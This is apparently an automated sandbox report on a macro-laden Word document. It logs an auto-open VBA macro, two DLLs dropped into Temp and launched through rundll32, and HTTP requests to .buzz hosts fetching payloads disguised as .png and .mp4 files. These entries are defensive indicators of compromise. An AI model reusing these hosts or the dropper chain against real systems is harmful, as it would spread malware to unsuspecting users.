Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000005.00000002.1198794640.000000000300F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://com.lightbuzear.buzz/
Source: rundll32.exe, 00000005.00000002.1198802455.000000000301C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel
Source: rundll32.exe, 00000005.00000002.1198775167.0000000002FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torel1ci
Source: rundll32.exe, 00000005.00000002.1198575987.0000000000215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://com.lightbuzear.buzz/Kolpt523ytcserstrew/torelEu
Source: rundll32.exe, 00000005.00000002.1198625904.000000000028B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1198764389.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000005.00000002.1198605277.0000000000250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/

Source: unknown

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6D74B366-D4C8-464E-A7CA-80C94D1A45EA}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: worldoptions.buzz

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4737230 LoadLibraryExW,GetProcAddress,ObtainUserAgentString,FreeLibrary,InternetOpenA,InternetConnectA,InternetCloseHandle,LoadLibraryW,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,GetProcAddress,GetProcAddress,HttpSendRequestA,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,FreeLibrary,CreateDirectoryW,FreeLibrary,std::ios_base::_Ios_base_dtor,GetModuleHandleA,GetProcAddress,InternetReadFile,wcsstr,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,FreeLibrary,std::ios_base::_Ios_base_dtor,

5_2_000007FEF4737230

Source: global traffic

HTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: worldoptions.buzzConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: worldoptions.buzzConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.52.80.180:443 -> 192.168.2.22:49175 version: TLS 1.2

System Summary

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\wnitmpo.dll			Jump to dropped file

Source: template[1].doc	OLE, VBA macro line: Private Declare PtrSafe Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As LongPtr, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As LongPtr, ByVal jjIILJillJlIiIij As Long) As Long
Source: template[1].doc	OLE, VBA macro line: Private Declare Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As Long, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As Long, ByVal jjIILJillJlIiIij As Long) As Long
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE, VBA macro line: Private Declare PtrSafe Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar" (ByVal LilIilljllJjLjIl As Long, ByVal LiIJJjiLLILjLLiL As Long, ByVal IjJIjiljLjLLiIlI As LongPtr, ByVal ljLLLJJilJJlIJLJ As Long, ByVal iLLiLJiiLJijIjjL As LongPtr, ByVal jjIILJillJlIiIij As Long) As Long
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE, VBA macro line: Private Declare Function IJIiLJIJlllJIjIJ Lib "kernel32" Alias "MultiByteToWideChar"(ByVal LilIilljllJjLjIl as Long, ByVal LiIJJjiLLILjLLiL as Long, ByVal IjJIjiljLjLLiIlI as Long, ByVal ljLLLJJilJJlIJLJ as Long, ByVal iLLiLJiiLJijIjjL as Long, ByVal jjIILJillJlIiIij as Long) as Long
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE, VBA macro line: JbxLog "win32:" & jbxline & ":IJIiLJIJlllJIjIJ" & ":kernel32!MultiByteToWideChar"

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF472BE90		5_2_000007FEF472BE90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4726F10		5_2_000007FEF4726F10
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4725EE0		5_2_000007FEF4725EE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4734F60		5_2_000007FEF4734F60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF475A4B0		5_2_000007FEF475A4B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF474679C		5_2_000007FEF474679C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4737230		5_2_000007FEF4737230
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF475D380		5_2_000007FEF475D380
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4756EBC		5_2_000007FEF4756EBC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4738F50		5_2_000007FEF4738F50
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF475000C		5_2_000007FEF475000C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4724FF0		5_2_000007FEF4724FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF475C92C		5_2_000007FEF475C92C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4757994		5_2_000007FEF4757994
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF47499F8		5_2_000007FEF47499F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF474AB7C		5_2_000007FEF474AB7C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4748C2C		5_2_000007FEF4748C2C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4745480		5_2_000007FEF4745480
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4721470		5_2_000007FEF4721470
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4733510		5_2_000007FEF4733510
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4750630		5_2_000007FEF4750630
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF47425E4		5_2_000007FEF47425E4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF474967C		5_2_000007FEF474967C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF474B70C		5_2_000007FEF474B70C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF47456F4		5_2_000007FEF47456F4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4752744		5_2_000007FEF4752744
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4751808		5_2_000007FEF4751808
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF474A044		5_2_000007FEF474A044
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF472B0C0		5_2_000007FEF472B0C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4734190		5_2_000007FEF4734190
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4722180		5_2_000007FEF4722180
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4756160		5_2_000007FEF4756160
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4749218		5_2_000007FEF4749218
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4752394		5_2_000007FEF4752394
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF4721380		5_2_000007FEF4721380
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF474C350		5_2_000007FEF474C350
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000007FEF47223E0		5_2_000007FEF47223E0

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF47589A8 appears 48 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000007FEF4722D50 appears 51 times

Source: template[1].doc	OLE, VBA macro line: Sub DoCUmeNT_OPEn()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function DoCUmeNT_OPEn			Name: DoCUmeNT_OPEn
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE, VBA macro line: Sub DoCUmeNT_OPEn()

Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: template[1].doc	OLE indicator, VBA macros: true
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll A2BE0FE4CAFBCA698873FADCA25970FE24DF6FD9C2F0DA1E2DEC6561A2C33177
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\wnitmpo.dll 0E209D2DE485637DF53C20C8425FF3F20AF6E04A46697D80F459EC6CD36C58B7

Source: template[1].doc

Virustotal: Detection: 12%

Source: C:\Windows\System32\taskeng.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {42E32873-DCC3-405E-9458-A04BFDF9CD6F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws			Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32

Jump to behavior

Source: template[1].LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\template[1].doc

Source: template[1].doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$mplate[1].doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR61BE.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.expl.evad.winDOC@4/13@3/3

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4738F50 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysFreeString,_time64,wcsftime,_com_util::ConvertStringToBSTR,SysFreeString,SysFreeString,GetWindowsDirectoryW,SysFreeString,SysFreeString,CoUninitialize,SysAllocString,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,

5_2_000007FEF4738F50

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws

Source: template[1].doc	OLE document summary: title field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: template[1].doc

Initial sample: OLE summary totaledittime = 403197

Source: ~WRF{78D6FE31-C42D-4CC6-B0D1-824575AF05A9}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: template[1].doc	Stream path 'VBA/ThisDocument' : High number of string operations
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	Stream path 'VBA/ThisDocument' : High number of string operations

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4738BC0 LoadLibraryW,GetProcAddress,FreeLibrary,

5_2_000007FEF4738BC0

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\wnitmpo.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF474679C EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000007FEF474679C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
